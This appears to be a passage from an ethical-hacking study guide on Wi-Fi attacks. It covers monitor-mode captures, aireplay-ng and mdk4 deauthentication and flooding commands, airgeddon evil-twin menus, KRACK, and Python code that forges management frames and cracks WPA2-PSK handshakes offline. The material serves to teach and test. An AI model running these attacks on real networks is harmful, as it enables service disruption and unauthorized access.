20:49:21.190521 1.0 Mb/s 2457 MHz 11b -43dBm signal antenna 1 Clear-To-Send RA:64:1c:b0:94:ba:57 (oui Unknown)
20:49:21.387878 1.0 Mb/s 2457 MHz 11b -67dBm signal antenna 1 Probe Request (WifiMyqGdo) [1.0 2.0 5.5 11.0 Mbit]
20: 49:21.403289 1.0 Mb/s 2457 MHz 11b -67dBm signal antenna 1 Probe Request (WifiMyqGdo) [1.0 2.0 5.5 11.0 Mbit]
20:49:21.537165 1.0 Mb/s 2457 MHz 11b -47dBm signal antenna 1 Probe Request (ZoeyWasHere) [1.0 2.0 5.5 11.0 Mbit]
20:49:21.589809 1.0 Mb/s 2457 MHz 11b -19dBm signal antenna 1 Acknowledgment RA:64:1c:b0:94:ba:57 (oui Unknown)
20:49:21.689230 1.0 Mb/s 2457 MHz 11b -43dBm signal antenna 1 Clear-To-Send RA:64:1c:b0:94:ba:57 (oui Unknown)
20:49:23.247016 1.0 Mb/s 2457 MHz 11b -67dBm signal antenna 1 Acknowledgment RA:ec:aa:a0:4d:31:a8 (oui Unknown)
20:49:23.250814 1.0 Mb/s 2457 MHz 11b -65dBm signal antenna 1 Acknowledgment RA:f6:aa:a0:4d:31:a8 (oui Unknown)
20:49:23.594399 1.0 Mb/s 2457 MHz 11b -19dBm signal antenna 1 Acknowledgment RA:64:1c:b0:94:ba:57 (oui Unknown)
20:49:23.602831 1.0 Mb/s 2457 MHz 11b -21dBm signal antenna 1 Beacon (CasaChien) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY
20:49:24.258485 1.0 Mb/s 2457 MHz 11b -43dBm signal antenna 1 Clear-To-Send RA:64:1c:b0:94:ba:57 (oui Unknown)
20:49:24.635482 1.0 Mb/s 2457 MHz 11b -57dBm signal antenna 1 Probe Request (CasaChien) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 63.5 Mbit]
20:49:24.656324 1.0 Mb/s 2457 MHz 11b -51dBm signal antenna 1 Acknowledgment RA:18:d6:c7:7d:ee:11 (oui Unknown)
20:49:24.658753 1.0 Mb/s 2457 MHz 11b -51dBm signal antenna 1 Acknowledgment RA:70:3a:cb:52:ab:fc (oui Unknown)

From the tcpdump output, you can see all of the radio traffic, including signal information. You can see the frequency being used for the communication, 2457 MHz in all the messages. You can also see the signal strength. This is measured in decibels in relation to a milliwatt, expressed as dBm. The decibel is a ratio of two values using a logarithmic scale. The dBm, however, isn't a ratio. It's an absolute value, as it uses the milliwatt as a reference point, and it is the standard way of measuring signal strength in wireless networks. Received Wi-Fi signals are far weaker than a milliwatt, so the values are negative, and every 10 dB is a factor of ten in power. Readings stronger than about -30 dBm are rare unless you are sitting next to the access point. The values of -19 dBm to -67 dBm seen here are all solid, usable signals. Somewhere around -80 dBm connections start to become unreliable, and by -90 to -100 dBm the signal is down at the noise floor and isn't usable.

What you can also see from the tcpdump output are probe requests for networks. These probe requests are coming from devices that remember these networks and are looking for them. For example, there is a garage door opener that has wireless capabilities trying to find the network WifiMyqGdo. This is the network that the device is configured with when it comes from the manufacturer. This information may be useful if you try to do an evil twin attack, since a device that probes for a network by name will happily associate with any access point that answers to it. However, you may want to see other information from the packet capture. What you can do is just write out the packet capture. In the following listing, you can see writing out the packet capture from tcpdump. Because we are using the monitor interface, we'll still get all of the radio messages.

Writing a Capture from a Monitor Interface

# tcpdump -w radio.pcap -i wlan0mon
tcpdump: listening on wlan0mon, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes
^C125 packets captured
126 packets received by filter
0 packets dropped by kernel

Once you have a saved packet capture, you can open it in a program like Wireshark. Figure 11.8 shows the same probe request mentioned earlier in more detail. Here you can see not only the SSID, you can also see some of the capabilities being requested by the station. You'll also see the channel being requested and the vendor ID of the equipment. This is part of what makes it clear it's a garage door opener. The vendor ID for the sending device is Chamberlain Group, which is the company that owns LiftMaster garage door openers. You'll also see there is vendor-specific information in the probe for Broadcom. Broadcom is a common wireless chipset manufacturer. This suggests that there is an expectation that the wireless device knows about Broadcom capabilities and expects to communicate using some of them.

FIGURE 11.8 Probe request in Wireshark

Wireshark can also provide additional details about the wireless connection that you were not able to see in tcpdump. In Figure 11.9, you can see the radio header information. This includes the channel frequency and number as well as the signal strength. In theory, the signal strength can give you an indication of the proximity of the radio you are looking at. This does assume that all radios and antennas are roughly equivalent, meaning signal strength would be a function of distance. In practice, however, there are a lot of other factors, including any materials the signal is passing through. Signals don't pass very well through concrete or metal, for example.

Radio headers and other wireless packets can provide us with some information. One of the challenges with this is that you are going to miss data unless you know the channel of the wireless network you want to sniff. If you are just trying to generally gather data, you may be able to frequency- or channel-hop if your card's driver supports that. When you channel-hop, though, you are moving from one channel to another, listening on each new channel. You are missing data on all the other channels. This is a limitation of wireless cards, just as with any other radio. You can tune into only a single frequency at a time. This means it's best to do some scanning ahead of time to identify which channel the network you really care about listening to is on.

FIGURE 11.9 Radio headers in Wireshark

Deauthentication Attack

A deauthentication attack sends management frames that force stations to drop their connection and reauthenticate with the access point. Essentially, it logs out any station, making the station reestablish the association. It works because, on networks without protected management frames, deauthentication frames are neither encrypted nor authenticated: anyone who knows the access point's BSSID and the station's MAC address can forge them. (802.11w, which WPA3 makes mandatory, adds a MIC to these frames, so a network with management frame protection enabled will ignore spoofed deauthentications.) This is another place to use the aircrack suite of tools. In this case, we're going to use aireplay-ng. As discussed, the interface needs to be on the right channel to know what frequency to send messages on. Under Linux, this is done using the iwconfig program (or the newer iw utility). Under Windows, this is done through the device properties of the wireless interface. In the following code, you can see setting the correct channel for the access point and then running a deauthentication attack. The -0 10 argument asks for ten rounds of deauthentication; each round sends 64 directed deauthentication frames, half addressed to the station as if from the access point and half addressed to the access point as if from the station. Reason code 7 means "class 3 frame received from a nonassociated station." The two numbers in brackets count the acknowledgments received for each direction; a persistent zero on one side means that device is not hearing, or not acting on, the forged frames.

Deauthentication Attack

# sudo iwconfig wlan0mon channel 6
# aireplay-ng -0 10 -a C4:EA:1D:D3:78:39 -c 64:52:99:50:48:94 wlan0mon
18:22:59  Waiting for beacon frame (BSSID: C4:EA:1D:D3:78:39) on channel 6
18:23:00  Sending 64 directed DeAuth (code 7). STMAC: [64:52:99:50:48:94] [ 0|62 ACKs]
18:23:00  Sending 64 directed DeAuth (code 7). STMAC: [64:52:99:50:48:94] [ 0|60 ACKs]
18:23:01  Sending 64 directed DeAuth (code 7). STMAC: [64:52:99:50:48:94] [ 0|34 ACKs]
18:23:01  Sending 64 directed DeAuth (code 7). STMAC: [64:52:99:50:48:94] [ 0|32 ACKs]
18:23:02  Sending 64 directed DeAuth (code 7). STMAC: [64:52:99:50:48:94] [ 0|61 ACKs]
18:23:02  Sending 64 directed DeAuth (code 7). STMAC: [64:52:99:50:48:94] [ 0|57 ACKs]
18:23:03  Sending 64 directed DeAuth (code 7). STMAC: [64:52:99:50:48:94] [ 0|59 ACKs]
18:23:03  Sending 64 directed DeAuth (code 7). STMAC: [64:52:99:50:48:94] [ 1|56 ACKs]
18:23:04  Sending 64 directed DeAuth (code 7). STMAC: [64:52:99:50:48:94] [ 0|55 ACKs]
18:23:05  Sending 64 directed DeAuth (code 7). STMAC: [64:52:99:50:48:94] [ 0|43 ACKs]

To perform this attack, you need to have the BSSID of the access point. This is the MAC address for the device, so it can be used in the frame headers. You also need the MAC address of the station on which you want to run the deauthentication attack. You can also run deauthentications against all stations by omitting the -c parameter, which is the client MAC address; that version is a broadcast deauthentication, and some stations ignore broadcast deauths, so directed frames are more reliable.
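The frames tcpdump and aireplay-ng have been showing (beacons, probe requests and deauthentications) all share the same 24-byte 802.11 management header, and they are simple enough to build and parse by hand. The following is an added example, not code from the study guide or from the aircrack-ng project: it constructs those frame types, decodes them the way a sniffer would (SSID, channel, PRIVACY bit, hidden SSID, deauth reason code), and runs a simple deauth-flood detector over a constructed capture. The MAC addresses are the ones that appear in the chapter's listings; a real capture would carry a radiotap header in front of each frame, which you would strip before decoding.

```python
"""Build and parse raw 802.11 management frames (beacon, probe request,
deauthentication) and flag deauthentication floods.

Added example, not code from the CEH study guide or from aircrack-ng. The
capture below is constructed locally, not recorded from a real network."""
import struct
from collections import Counter

# Frame Control byte 0 for type 0 (management) frames is subtype << 4.
MGMT_SUBTYPES = {0x40: "probe-request", 0x50: "probe-response", 0x80: "beacon",
                 0xA0: "disassoc", 0xC0: "deauth"}
BROADCAST = b"\xff" * 6


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_ies(data: bytes) -> dict:
    """Information elements are TLVs: element id (1 byte), length (1 byte), value."""
    ies, i = {}, 0
    while i + 2 <= len(data):
        eid, length = data[i], data[i + 1]
        ies[eid] = data[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def parse_mgmt_frame(frame: bytes) -> dict:
    """Decode the MAC header (frame control, duration, addr1-3, sequence) and the body."""
    if len(frame) < 24:
        raise ValueError("shorter than an 802.11 MAC header")
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:                     # type bits: 0 = management
        return {"kind": "not-management"}
    info = {"kind": MGMT_SUBTYPES.get(fc0 & 0xF0, "other-mgmt"),
            "da": mac_str(frame[4:10]),           # addr1: destination
            "sa": mac_str(frame[10:16]),          # addr2: source / transmitter
            "bssid": mac_str(frame[16:22])}       # addr3: BSSID
    body = frame[24:]
    if info["kind"] == "beacon":
        # fixed fields: timestamp (8), beacon interval (2), capability (2); then IEs
        capability = struct.unpack("<H", body[10:12])[0]
        ies = parse_ies(body[12:])
        ssid = ies.get(0, b"")
        info["ssid"] = ssid.decode(errors="replace") if ssid else None  # None: hidden SSID
        info["privacy"] = bool(capability & 0x0010)                     # encryption in use
        info["channel"] = ies[3][0] if 3 in ies else None               # DS Parameter Set
    elif info["kind"] == "probe-request":
        ssid = parse_ies(body).get(0, b"")
        info["ssid"] = ssid.decode(errors="replace") if ssid else None  # None: wildcard probe
    elif info["kind"] in ("deauth", "disassoc"):
        info["reason"] = struct.unpack("<H", body[:2])[0]
    return info


def build_mgmt(fc0: int, addr1: bytes, addr2: bytes, addr3: bytes, body: bytes) -> bytes:
    # frame control (2, little-endian), duration (2), three addresses, sequence control (2)
    return struct.pack("<BBH", fc0, 0, 0) + addr1 + addr2 + addr3 + struct.pack("<H", 0) + body


def build_beacon(bssid: bytes, ssid: str, channel: int, privacy: bool = True) -> bytes:
    capability = 0x0001 | (0x0010 if privacy else 0)       # ESS, optionally PRIVACY
    fixed = struct.pack("<QHH", 0, 100, capability)       # timestamp, interval (TUs), capability
    ies = bytes([0, len(ssid)]) + ssid.encode() + bytes([3, 1, channel])
    return build_mgmt(0x80, BROADCAST, bssid, bssid, fixed + ies)


def build_probe_request(station: bytes, ssid: str) -> bytes:
    return build_mgmt(0x40, BROADCAST, station, BROADCAST, bytes([0, len(ssid)]) + ssid.encode())


def build_deauth(bssid: bytes, station: bytes, reason: int = 7) -> bytes:
    """Forged deauth of the kind aireplay-ng -0 sends: appears to come from the AP."""
    return build_mgmt(0xC0, station, bssid, bssid, struct.pack("<H", reason))


def deauth_flood_sources(frames, threshold: int = 10) -> dict:
    """Count deauth frames per (bssid, target) pair and report pairs at or over threshold.
    Legitimate deauthentications are rare; dozens aimed at one station is an attack."""
    counts = Counter()
    for raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed["kind"] == "deauth":
            counts[(parsed["bssid"], parsed["da"])] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


# Constructed sample capture (assumed contents, not a real recording)
AP = bytes.fromhex("c4ea1dd37839")        # CenturyLink5191 BSSID from the listings above
HIDDEN_AP = bytes.fromhex("18d6c77dee11") # second BSSID from the listings, beaconing a hidden SSID here
STATION = bytes.fromhex("645299504894")   # the garage door opener
SAMPLE_CAPTURE = ([build_beacon(AP, "CenturyLink5191", 6), build_beacon(HIDDEN_AP, "", 11),
                   build_probe_request(STATION, "WifiMyqGdo")]
                  + [build_deauth(AP, STATION) for _ in range(64)])

if __name__ == "__main__":
    for raw in SAMPLE_CAPTURE[:4]:
        print(parse_mgmt_frame(raw))
    print("deauth floods:", deauth_flood_sources(SAMPLE_CAPTURE))
```

Feeding the management frames from a real pcap through deauth_flood_sources() is the basic logic of a wireless intrusion detection rule: one burst from aireplay-ng produces 64 frames for a single (BSSID, station) pair within a second, far outside anything an access point does on its own.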
To get the details you need to run this attack, you can use airodump-ng, another program in the aircrack-ng suite of programs. In the following listing, you can see the output of airodump-ng. You'll see all of the BSSIDs that are within range of the system on which airodump-ng is being run. This gives you the BSSID, the power level, the number of beacons, the channel number, and other details. At the bottom, you can see the stations, the BSSIDs they are associated with, and the SSIDs that unassociated stations are probing for.

Using airodump-ng to Acquire Information (Rate, Lost and Frames columns trimmed)

 CH  6 ][ Elapsed: 6 mins ][ 2018-12-16 18:22

 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER AUTH  ESSID

 18:D6:C7:7D:EE:11  -21     3099     55    0  11  195  WPA2  CCMP   PSK   CasaChien
 C4:EA:1D:D3:78:39  -36     2181      6    0   6  130  WPA2  CCMP   PSK   CenturyLink5191
 70:3A:CB:52:AB:FC  -40      211      0    0  11  130  WPA2  CCMP   PSK   CasaChien
 70:3A:CB:15:F5:A1  -41     1391     21    0  11  130  WPA2  CCMP   PSK   CasaChien
 FA:8F:CA:6C:2D:6D  -42     1600      0    0  11  130  OPN                MasterBedroomTV.m
 70:3A:CB:4A:41:3B  -44     2111     56    0   6  130  WPA2  CCMP   PSK   CasaChien
 92:CD:B6:13:FE:3C  -55      196      0    0   6   65  OPN                HP-Setup>3c-M277 LaserJet
 70:8B:CD:CD:92:30  -65     1641      7    0  11  195  WPA2  CCMP   PSK   Hide_Yo_Kids_Hide_Yo_WiFi
 EC:AA:A0:4D:31:A8  -67        0      0    0   9  195  WPA2  CCMP   PSK   HOME-C377-2.4
 A0:04:60:21:34:12  -66        0      6    0   9   -1  WPA

 BSSID              STATION            PWR   Probe

 (not associated)   94:9F:3E:01:10:FB  -36
 (not associated)   F0:18:98:0C:34:69  -38   Sonos_lHe9qyhhveucJ2UnQWM67LjZ9g
 (not associated)   F0:6E:0B:69:60:1B  -40
 (not associated)   78:28:CA:09:8E:41  -46   Sonos_lHe9qyhhveucJ2UnQWM67LjZ9g
 (not associated)   94:9F:3E:00:FD:83  -46   Sonos_lHe9qyhhveucJ2UnQWM67LjZ9g
 (not associated)   94:9F:3E:0F:1D:81  -46   Sonos_lHe9qyhhveucJ2UnQWM67LjZ9g
 (not associated)   38:8B:59:20:E9:DF  -48
 (not associated)   90:CD:B6:13:7E:3C  -50   ZoeyWasHere
 (not associated)   64:52:99:50:48:94  -64   WifiMyqGdo
 (not associated)   C0:97:27:5A:2D:F1  -68
 (not associated)   34:7C:25:25:AB:92  -56
 18:D6:C7:7D:EE:11  38:F7:3D:04:92:79  -34
 18:D6:C7:7D:EE:11  64:1C:B0:94:BA:57  -46
 18:D6:C7:7D:EE:11  94:9F:3E:0F:1D:80  -46
 18:D6:C7:7D:EE:11  F0:81:73:95:8C:47  -58
 18:D6:C7:7D:EE:11  94:9F:3E:00:FD:82  -44
 70:3A:CB:15:F5:A1  94:9F:3E:01:10:FA  -36
 70:3A:CB:15:F5:A1  00:FC:8B:AB:0B:B8  -44
 70:3A:CB:4A:41:3B  78:28:CA:09:8E:40  -46

Notice that the garage door opener targeted in the deauthentication listing, 64:52:99:50:48:94, shows up here as not associated and probing for WifiMyqGdo, which is consistent with the zero acknowledgment count on one side of the aireplay-ng output: you can only knock a station off an access point it is actually connected to.

There are a couple of reasons you might want to run a deauthentication attack. One is to get a hidden ESSID. Since the ESSID isn't being broadcast in beacons, you can't retrieve it from the access point's announcements. You can, though, get it from a station, because the probe request and association request a station sends when it joins carry the SSID in the clear. If you force the client into an unauthenticated state, that station will need to reconnect, which will allow you to capture the ESSID from the client when it reassociates.

Another reason is to capture the handshakes that take place during association. Under WEP, the traffic you generated this way, along with any other data frames, would allow retrieval of the encryption key, because of the weakness in how the initialization vector was combined with the key. This meant that if you also captured all the encrypted traffic, you would be able to decrypt it. This particular weakness doesn't exist in WPA2. This is not to say there aren't other ways to attack WPA2 networks. Under WPA2-Personal, a captured four-way handshake contains everything needed to test passphrase guesses offline: the two nonces and two MAC addresses determine the PTK for any candidate PMK, and the MIC on the second message tells you whether the candidate was right. Forcing a station to reconnect and capturing that handshake is the most common reason to run a deauthentication attack against a WPA2 network, and tools like aircrack-ng and hashcat exist to run the guessing.
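The four-way handshake described in the WPA2 section and the offline attack against a captured handshake just mentioned are two views of the same arithmetic, so one added example covers both. This is not code from the study guide or from aircrack-ng or hashcat; it implements the 802.11i key schedule for WPA2-Personal with CCMP (PBKDF2-HMAC-SHA1 to get the PMK, the "Pairwise key expansion" PRF to get the PTK, and HMAC-SHA1 over the EAPOL-Key frame for the MIC), plays the station's side of message 2 for a passphrase of our choosing, and then recovers that passphrase from the resulting frame with a small wordlist. The SSID and MAC addresses reuse values from the listings above; the nonces, passphrase and wordlist are constructed. The PBKDF2 check against the IEEE 802.11i test vector ("password"/"IEEE") shows the derivation is the standard one.

```python
"""WPA2-PSK key derivation and the offline dictionary attack that a captured
four-way handshake makes possible.

Added example, not code from the CEH study guide or from aircrack-ng/hashcat.
  PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
  PTK = PRF-384(PMK, "Pairwise key expansion",
                min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
  MIC = HMAC-SHA1(KCK = PTK[0:16], EAPOL-Key frame with MIC field zeroed)[0:16]
The handshake below is constructed locally, not captured from a network."""
import hashlib
import hmac
import struct

EAPOL_MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields precede the MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP = KCK (16) || KEK (16) || TK (16); order-independent in addresses/nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def build_eapol_msg2(snonce: bytes, replay_counter: int, key_data: bytes) -> bytes:
    """EAPOL-Key message 2 (station -> access point) with the MIC field zeroed."""
    key_info = 0x010A   # descriptor version 2 (HMAC-SHA1 / AES key wrap), pairwise, MIC present
    body = (struct.pack(">BHH", 2, key_info, 0)             # descriptor type, key info, key length
            + replay_counter.to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, RSC, key ID
            + b"\x00" * 16                                         # MIC placeholder
            + struct.pack(">H", len(key_data)) + key_data)
    return struct.pack(">BBH", 1, 3, len(body)) + body      # 802.1X: version, EAPOL-Key, length


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    zeroed = eapol_frame[:EAPOL_MIC_OFFSET] + b"\x00" * 16 + eapol_frame[EAPOL_MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def supplicant_msg2(passphrase, ssid, aa, spa, anonce, snonce) -> bytes:
    """What the station sends as message 2: its SNonce plus a MIC keyed with the KCK."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN: CCMP, AKM PSK
    frame = build_eapol_msg2(snonce, 1, rsn_ie)
    mic = eapol_mic(ptk[:16], frame)
    return frame[:EAPOL_MIC_OFFSET] + mic + frame[EAPOL_MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_msg2, wordlist):
    """Offline attack. Everything here except the passphrase is visible in a capture of
    messages 1 and 2; each guess costs one PBKDF2 (the slow part) plus a few HMACs."""
    captured_mic = eapol_msg2[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16]
    for candidate in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_msg2), captured_mic):
            return candidate
    return None


# Constructed handshake parameters (assumed values, not from a real capture)
SSID = "CenturyLink5191"
AA = bytes.fromhex("c4ea1dd37839")         # access point BSSID from the chapter's listings
SPA = bytes.fromhex("645299504894")        # station MAC from the chapter's listings
ANONCE = bytes(range(32))                  # fixed for reproducibility; real nonces are random
SNONCE = bytes(range(32, 64))
MSG2 = supplicant_msg2("garage-door-2018", SSID, AA, SPA, ANONCE, SNONCE)
WORDLIST = ["password", "letmein", "CenturyLink", "garage-door-2018", "hunter2"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_psk(SSID, AA, SPA, ANONCE, SNONCE, MSG2, WORDLIST))
```

The cost of this attack is set entirely by PBKDF2 (4,096 HMAC-SHA1 rounds per guess) and by how guessable the passphrase is; nothing the access point does later can add protection once the handshake is on disk. That is the weakness WPA3's SAE removes, since with SAE the captured exchange no longer gives an offline oracle for password guesses.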
Evil Twin

An evil twin is a rogue access point configured to look just like a legitimate access point, meaning it advertises a known SSID. You would think this was a fairly easy thing to do. You could just set up an access point and let stations associate to it. That may not help you an awful lot, though. You could get systems onto a network you control, hoping you could compromise them. You could also potentially capture unencrypted web traffic, which may include usernames and passwords. However, better would be to gather information from the stations, such as authentication information or, as needed, a PSK. This would give you a means to gain access to the enterprise network. Getting this information, though, requires more than just an access point. Ideally, you would have an intelligent means of interacting with the stations and collecting information they may have.

There are a few programs you can use that will make life a lot easier for you if you want to use an evil twin attack. One program is wifiphisher, which can be used to impersonate a wireless network while jamming a legitimate access point and then redirect traffic to a site managed by you. This means you don't have to worry about any encryption issues if you want to pretend to be a commonly visited website. You don't have to try to decrypt the traffic because you can just capture it from your web pages.

Another tool you can use is airgeddon. This is a program that will work on Linux distributions and can be used for several types of wireless attacks. In the code listing that follows, you can see the initial menu, after it has tested your system for compatibility as well as the existence of all of the tools and libraries the program will need. Many of the attacks require the interface to be put into monitor mode, which airgeddon can do. Rather than putting the interface into monitor mode as part of an attack, it's a menu option. You'll also see there is a Handshake tools menu selection. This is where you could capture the handshakes done as part of association.

airgeddon Attack Menu

Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz

Select an option from menu:
---------
0.  Exit script
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
---------
4.  DoS attacks menu
5.  Handshake tools menu
6.  Offline WPA/WPA2 decrypt menu
7.  Evil Twin attacks menu
8.  WPS attacks menu
9.  WEP attacks menu
---------
10. About & Credits
11. Options and language menu

We were talking about evil twin attacks, though. That's also a menu selection. Once you select Evil Twin Attacks Menu, you are presented with another set of menu options. Again, you can put the interface into monitor mode. You will also be able to choose different types of evil twin attacks. Just creating an evil twin access point is a good start, but if you use that attack, you will need to bring in other tools to capture data. It's easiest to let airgeddon just set up the complete attack for you. You can see that in addition to the evil twin, you can enable sniffing and sslstrip. The use of sslstrip will help to potentially downgrade web traffic to plain HTTP so you can read it; if this attack works, you will get web traffic in plaintext. Be aware that sites using HTTP Strict Transport Security (HSTS), which now includes most major sites, will not downgrade, so sslstrip yields much less than it did a decade ago. You can also use bettercap to perform spoofing attacks on top of just seeing wireless traffic. This also allows you to use the Browser Exploitation Framework (BeEF) to exploit vulnerabilities in browsers. This could let you compromise a system through someone using their web browser.

Evil Twin Attack Menu

*************************** Evil Twin attacks menu ***************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz
Selected BSSID: None
Selected channel: None
Selected ESSID: None

Select an option from menu:
---------
0.  Return to main menu
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
4.  Explore for targets (monitor mode needed)
---------------- (without sniffing, just AP) -----------------
5.  Evil Twin attack just AP
---------------------- (with sniffing) -----------------------
6.  Evil Twin AP attack with sniffing
7.  Evil Twin AP attack with sniffing and sslstrip
8.  Evil Twin AP attack with sniffing and bettercap-sslstrip2/BeEF
------------- (without sniffing, captive portal) -------------
9.  Evil Twin AP attack with captive portal (monitor mode needed)
---------

One thing to note here is that airgeddon needs a second wireless interface for the evil twin attacks that jam the real access point while hosting the rogue one: one card runs the rogue access point while the other sends the denial-of-service traffic against the legitimate access point, keeping it from responding to the station so the station falls back to the rogue access point. The second card is also what makes DoS pursuit mode possible, which keeps the denial-of-service attack following the legitimate access point if it changes channel, so a channel switch doesn't defeat the attack.

While airgeddon is a useful tool, there is nothing it does that is unique. Under the hood, it is using a collection of tools that you need to already have in place, like hostapd, a DHCP server, dnsspoof, and a lightweight HTTP server. The advantage of airgeddon is that it pulls all of those tools together. This makes complex, multitool attacks considerably easier. All you need to do is run airgeddon rather than having to set up several tools and get all the parameters right with them running in the correct order, as needed.

Key Reinstallation

So far, you may have gotten the impression that wireless networks that are using WPA2 are invulnerable to attack, short of pretending to be the legitimate wireless network or guessing a weak passphrase. When a station goes through a four-way handshake, one of the outcomes is a session key that gets used for encryption and decryption. It's called a session key because it's used for the duration of the session while the station is connected to the access point. As these are potentially
vulnerable over time, they are often replaced if the connection is maintained over a long period of time. This is not the only problem with session keys. Since session keys are derived rather than known ahead of time, an attacker who can interfere with how the key is installed and used can undo the protection it provides. The four-way handshake is used to allow the station and the access point to derive the pairwise key from the PMK, the two MAC addresses, and a random value, or nonce, contributed by each side (the ANonce from the access point and the SNonce from the station). The third message of the handshake is what tells the client to install the key used for the session. Since messages can get lost, especially as stations get farther from the access point, the access point retransmits that third message when it gets no reply, and clients accept the retransmission and install the key again. An attacker positioned between the two (for example, running a clone of the access point on another channel) can take advantage of this by withholding the fourth message, collecting the retransmitted third messages, and replaying them later. The attacker doesn't learn the key. What the replay does is reset the per-packet nonce (the packet number) and the replay counter that the cipher (TKIP, CCMP, or GCMP) keeps alongside the key. Once those are reset, the station encrypts new frames with keystream it has already used, and an attacker holding both ciphertexts can decrypt them. With TKIP and GCMP, the same reuse also lets the attacker forge and inject frames. Some clients made it worse: wpa_supplicant 2.4 and 2.5, used on Android 6 and some Linux systems, cleared the key from memory after installing it, so the reinstalled key was all zeros and everything the station sent could be decrypted trivially. If handshake messages can be replayed, every key the handshake establishes is exposed. This means not only the session key between a station and an access point but also the group key, which exposes multicast and broadcast transmissions over the wireless network. Any wireless network, whether it is using WPA or WPA2, Enterprise or Personal, may be vulnerable to this sort of attack, because the weakness is in the handshake itself rather than in the authentication method. As of this writing, there are not a lot of tools available to automate the exploitation of this Key Reinstallation Attack (KRACK), though Mathy Vanhoef's krackattacks-scripts will tell you whether a client or access point is vulnerable. There are, however, fixes available for network elements: a patched station refuses to reinstall a key it has already installed, and a patched access point does the same for the group key.

Using mdk3/4

Several tools exist for wireless attacks. One of these that can be used for multiple types of attacks is mdk3, along with its successor mdk4. This is a tool that can be used to perform beacon flooding, authentication denial-of-service attacks, and deauthentication attacks, along with other tests. It can be installed in Kali Linux and Parrot OS, and both versions are available in both operating systems. To get started, you need to enable monitor mode on the wireless interface. You can do this by using airmon-ng from the aircrack-ng toolkit. The following is the command used to turn on monitor mode on the interface wlan0 on wireless channel 1:

$ airmon-ng start wlan0 1

Once you have monitor mode enabled, you can start launching attacks. The a mode is an authentication denial of service: mdk4 sends authentication frames from made-up client addresses to every access point it finds on the channel you specified when you turned on monitor mode, which can fill the access point's client table and freeze or reset it. The following is the command used to run the authentication attack using the interface wlan0mon:

$ sudo mdk4 wlan0mon a
Waiting for targets...
Found new target AP 60:5F:8D:CD:77:A9
Found new target AP F8:BC:0E:05:BB:89
Found new target AP F8:BC:0E:05:D1:C9
Found new target AP 54:83:3A:AF:99:9D
Found new target AP 88:DA:1A:27:EB:C4
Found new target AP F8:BB:BF:7A:BF:03
Connecting Client F6:28:45:5A:18:AB to target AP 60:5F:8D:CD:77:A9
Status: No Response. Packets sent: 1 - Speed: 1 packets/sec

This is a broad-stroke attack, which isn't generally what you would be doing. Other attacks would be targeted at individual SSIDs. For these attacks, you'd need to provide some additional information. The p mode sends probe requests for a named SSID and reports whether an access point answers, which tells you whether that network is within range; combined with a wordlist, it can brute-force the name of a cloaked (hidden) network. The following is one of these attacks against an SSID named WubbleWiFi:

$ sudo mdk4 wlan0mon p -e WubbleWiFi
AP responded on 0 of 1 probes (0 percent)
Packets sent: 1 - Speed: 1 packets/sec
AP responded on 0 of 127 probes (0 percent)
Packets sent: 128 - Speed: 127 packets/sec

Wireless Attacks
Use mdk4 to perform testing on an access point you own or are authorized to test. You should try to perform a deauthentication attack. You can watch the attack to see how it works using Wireshark to monitor the radio traffic. Don't run this against other people's networks: deauthenticating their stations is a denial of service, and it is illegal in most jurisdictions.

Bluetooth

It's not only network transmission that has gone wireless. Peripherals have also gone wireless. More than that, any two devices that would commonly communicate over a wire may use a wireless protocol called Bluetooth. Bluetooth is a wireless protocol allowing for short-range communication between one device and another. It operates in the set of frequencies referred to as the 2.4 GHz ISM band. 802.11 uses a portion of the same frequency spectrum. While a Class 1 Bluetooth device has a range of about 100 meters because of its higher transmit power, most Bluetooth devices are Class 2 and have a range of about 10
meters, requiring close proximity to interact with them.

